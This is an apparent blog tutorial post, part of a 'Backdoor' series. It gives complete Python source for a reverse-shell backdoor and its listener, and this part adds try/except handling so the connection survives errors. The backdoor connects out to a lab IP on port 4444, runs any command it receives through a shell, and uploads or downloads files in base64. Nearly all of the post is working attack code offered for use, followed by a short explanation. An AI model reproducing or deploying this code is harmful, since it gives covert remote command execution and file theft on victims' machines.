Backdoor 08 : Adding exception & python3 conversion

 #ADDING EXCEPTION TO AVOID CRASH:

If the client or server crashes, the connection will be lost.

#Backdoor crashes if:

  • Incorrect command is sent.
  • Correct command is misused.

#CODE: ADDING TRY AND EXCEPT IN BACKDOOR

  1. #!/usr/bin/env python
  2. import socket
  3. import subprocess
  4. import json
  5. import os
  6. import base64

  7. class Backdoor:
  8. def __init__(self, ip, port):
  9. self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  10. self.connection.connect((ip, port))

  11. def json_send(self, data):
  12. json_data = json.dumps(data)
  13. self.connection.send(json_data)

  14. def json_receive(self):
  15. json_data = ""
  16. while True:
  17. try:
  18. json_data = json_data + self.connection.recv(1024)
  19. return json.loads(json_data)
  20. except ValueError:
  21. continue

  22. def execute_system_command(self, command):
  23. return subprocess.check_output(command, shell=True)

  24. def change_working_directory_to(self, path):
  25. os.chdir(path)
  26. return "[+] Working directory has been changed" + path

  27. def read_file(self, path):
  28. with open(path, "rb") as file:
  29. return base64.b64encode(file.read())

  30. def write_file(self, path, content):
  31. with open(path, "wb") as file:
  32. file.write(base64.b64decode(content))
  33. return "[+] Upload sucessfull.."

  34. def run(self):
  35. while True:
  36. command = self.json_receive()

  37. try:
  38. if command[0] == "exit":
  39. self.connection.close()
  40. exit()
  41. elif command[0] == "cd" and len(command) > 1:
  42. command_result = self.change_working_directory_to(command[1])

  43. elif command[0] == "download":
  44. fix_blank = " ".join(command[1:])
  45. command_result = self.read_file(fix_blank)

  46. elif command[0] == "upload":
  47. command_result = self.write_file(command[1], command[2])

  48. else:
  49. command_result = self.execute_system_command(command)

  50. except Exception:
  51. command_result = "[-] Error during command execution."

  52. self.json_send(command_result)

  53. my_backdoor = Backdoor("10.0.2.15", 4444)
  54. my_backdoor.run()
#CODE: ADDING TRY AND EXCEPT IN LISTENER

  1. #!/usr/bin/env python
  2. import socket
  3. import json
  4. import base64

  5. class Listener:
  6. def __init__(self, ip, port):
  7. listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  8. listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  9. listener.bind((ip, port))
  10. listener.listen(0)
  11. print("[+]Waiting for incomming connection")
  12. self.connection, address = listener.accept()
  13. print("[+]Got a connection from" + str(address))

  14. def json_send(self, data):
  15. json_data = json.dumps(data)
  16. self.connection.send(json_data)

  17. def json_receive(self):
  18. json_data = ""
  19. while True:
  20. try:
  21. json_data = json_data + self.connection.recv(1024)
  22. return json.loads(json_data)
  23. except ValueError:
  24. continue

  25. def execute_remotely(self, command):
  26. self.json_send(command)

  27. if command[0] == "exit":
  28. self.connection.close()
  29. exit()

  30. return self.json_receive()

  31. def write_file(self, path, content):
  32. with open(path, "wb") as file:
  33. file.write(base64.b64decode(content))
  34. return "[+] Download sucessfull.."

  35. def read_file(self, path):
  36. with open(path, "rb") as file:
  37. return base64.b64encode(file.read())

  38. def run(self):
  39. while True:
  40. command = raw_input(">> ")
  41. command = command.split(" ")

  42. try:

  43. if command[0] == "upload":
  44. file_content = self.read_file(command[1])
  45. command.append(file_content)
  46. # LIST = ["upload","sample.txt","content of the file"]

  47. result = self.execute_remotely(command)

  48. if command[0] == "download" and "[-] Error" not in result:
  49. fix_blank = " ".join(command[1:])
  50. result = self.write_file(command[1], result)
  51. # LIST = ["upload","sample.txt"]

  52. except Exception:
  53. result = "[-] Error during command execution."

  54. print(result)

  55. my_listener = Listener("10.0.2.15", 4444)
  56. my_listener.run()
#EXPLANATION
WE PUT ALL THE FUNCTIONALITY OF OUR BACKDOOR IN TRY AND EXCEPT
we will except any type of error and accept that and give result
[-] Error during command execution.

so the error got send to the listener but we do not need 
so we add a condition in our listener
line = 61
if command[0] == "download" and "[-] Error" not in result:
if the error is in the result then we need to print the result

WE ALSO PUT TRY & EXCEPT IN OUR LISTENER
if there is error than give result
[-] Error during command execution.

#FINALY OUR BACKDOOR IS COMPLETED:)
NOTE: OUR PROGRAM WORKS IN ALL TYPES OF OS
#BACKDOOR PYTHON2

#we have written our code in python 2 which is ok cuz we will further learn to package hence it does not matter if u write ur code in python2 or 3 to see this program in python3 check-out Github
#BACKDOOR PYTHON3

Post a Comment

If you have any doubts, please let me know

Previous Post Next Post